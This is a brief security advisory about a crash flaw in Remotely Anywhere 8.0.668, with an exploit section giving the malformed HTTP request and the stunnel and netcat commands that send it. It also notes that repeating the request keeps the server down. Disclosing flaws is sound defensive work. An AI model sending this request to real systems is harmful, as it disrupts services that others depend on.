|
|
| |
| Remotely Anywhere is "a well known remote administration software". A vulnerability in Remotely Anywhere allows remote attackers to crash the product by sending it a malformed HTTP request. |
| |
Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/remotelynowhere-adv.txt
|
| |
Vulnerable Systems:
* Remotely Anywhere Server and Workstation version 8.0.668
The RemotelyAnywhere.exe process (port 2000) can be easily crashed through a HTTP request with an invalid Accept-Charset parameter which leads to a NULL pointer.
The process will be restarted automatically within less than one minute by the management service so an attacker needs to send the malformed request at regular intervals for keeping the server down as much as he desires.
Exploit:
Send:
GET / HTTP/1.1
Accept-Charset: boom
Using the following command line:
stunnel http_to_https.conf
nc 127.0.0.1 80 -v -v < remotelynowhere.txt
|
|
|
|
|
|
|
|
